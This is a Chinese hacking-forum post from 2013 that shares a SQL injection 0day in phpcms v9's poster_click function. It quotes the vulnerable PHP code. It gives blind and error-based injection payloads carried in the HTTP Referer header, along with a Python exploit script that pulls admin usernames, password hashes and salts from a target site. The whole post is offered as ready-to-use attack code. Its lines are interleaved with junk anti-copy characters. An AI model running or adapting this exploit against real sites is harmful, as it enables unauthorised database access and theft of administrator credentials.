找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2282|回复: 0
打印 上一主题 下一主题

phpcms post_click注入0day利用代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:01:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ }8 E8 j3 Y) C, c) [
2 c6 p2 _+ ]1 R  x, G7 R问题函数\phpcms\modules\poster\index.php- G% D( I$ P0 `, S4 ^
  _' D& U- t% k' k% M5 |# p
public function poster_click() {/ H& o9 N# w/ Q
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
3 F8 |: p2 [# B7 v: p$r = $this->db->get_one(array('id'=>$id));
# [0 v- {. Q: P" }, eif (!is_array($r) && empty($r)) return false;
6 \4 k' w5 a4 l; O8 z3 h$ip_area = pc_base::load_sys_class('ip_area');
9 M& r: A0 J* \! o$ip = ip();+ I4 v: c/ k+ M, x0 L9 t3 h
$area = $ip_area->get($ip);6 V, x0 y; t4 d0 Z8 a
$username = param::get_cookie('username') ? param::get_cookie('username') : '';/ \& V% U5 N  j
if($id) {: G* |. |; ]/ D- e4 V, ^, K
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();7 k7 W+ z. K) I- F# U
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
* j# ]8 k% d+ k7 f0 Q}
/ ?( t: _+ Q* W$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));% K7 K) O. a2 t! T* A) t: T
$setting = string2array($r['setting']);7 ]' ^& R/ W$ t( x
if (count($setting)==1) {
9 K( M8 ?( x+ r9 q$url = $setting['1']['linkurl'];$ A/ g/ ~$ k+ K' `) t+ p# i1 ~
} else {
, b4 O& h3 E6 d6 \$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];9 d- E4 B- L4 P1 I0 W
}
9 R: Y2 C4 y3 U4 S2 C, }7 kheader('Location: '.$url);
( H% l4 `& ^2 m  S}  X+ {2 J+ L2 F9 R% ~/ J* P
/ q  D  u) Q. P3 f

& F$ J  Q( ?8 F8 ]' V  R
3 R6 P% h3 x) S: X* i1 h1 T6 V' @利用方式:
- [; |5 I! E" \$ ~0 y) Z
. l% X9 ^  ?' ^# r) b3 j! P1、可以采用盲注入的手法:, D$ \, n; v6 r2 o8 v6 B& D5 x
6 Q. h7 @" t# o5 x2 d
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)## q% {" E! q: y, X- _1 `5 P0 U. V; J

4 ?9 ?) [8 n. z/ f# ?$ t+ c通过返回页面,正常与否一个个猜解密码字段。
6 X( S) J% P* k; O, O9 E3 s6 ?2 W1 n4 t% V  O! L, F% @3 z# @
2、代码是花开写的,随手附上了:" f$ z+ w1 Q$ }( X
- B; y& R# T/ k- Y( {
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#/ ]$ y( I9 z! `, r9 k# i/ ~
% O3 L3 ~4 |" z' i4 |
此方法是爆错注入手法,原理自查。
( A2 D: R/ y0 u$ B$ c# i: w1 ]7 m+ ?& T1 U) }
9 n8 p3 g% j! l) j- q/ h9 V4 F

: {4 q; O& r+ `* o9 d7 d利用程序:
& b; z& g4 n  N5 F$ [
3 s4 H3 \- Y  R3 f#!/usr/bin/env python$ Y3 t7 p1 k% \/ b- X. ]
import httplib,sys,re+ y+ V( O$ x3 ?( \2 N( [

' c% z1 w& l4 i% e* T! Tdef attack():
' J7 ]3 R3 S7 o& m) b, rprint “Code by Pax.Mac Team conqu3r!”) [( C6 G7 Q/ B* U5 M* {6 P: \8 X
print “Welcome to our zone!!!”9 \7 g* e5 @% Z: X
url=sys.argv[1]
; }$ F" ]- a  Qpaths=sys.argv[2]
0 w+ _; |) \1 B7 l# [conn = httplib.HTTPConnection(url)
! O- K0 w- `" j* hi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,& S% {& Q0 a6 q5 l; D' h6 s& B
“Accept”: “text/plain”,
5 N7 F' q; Q; p9 F5 ]8 F“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}% _# p% [4 D; A+ d
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)$ K+ @5 p  Y+ h8 y! b; r8 t+ c
r1 = conn.getresponse()( }) ?6 R% u6 g  F
datas=r1.read()4 x% z& m( G" o) s8 Z: p) k- D
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
$ [# i% j. K$ e$ \. hprint datas[0]# i8 Q1 ^* I- V8 m: }  A
conn.close()
: x. z1 C9 K) F% r9 o$ I5 S# T$ @if __name__==”__main__”:& |0 ?& S8 ]# j# ]  D) e  J
if len(sys.argv)<3:" J0 W8 X- w$ @
print “Code by Pax.Mac Team conqu3r”" w: o2 j2 S6 Y! v) c
print “Usgae:”- n5 d- k2 g* {2 k
print “    phpcmsattack.py   www.paxmac.org /”
) w) W' g: b3 K  w( z& `4 Lprint “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”& N! _. ^* ?5 r* A
sys.exit(1)
3 j" D! w$ Z. W. _( @- w, C" Kattack()& P. F9 f6 @+ h* P; r. v
4 i9 C" r0 o( W$ I$ t- Y; Q) }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表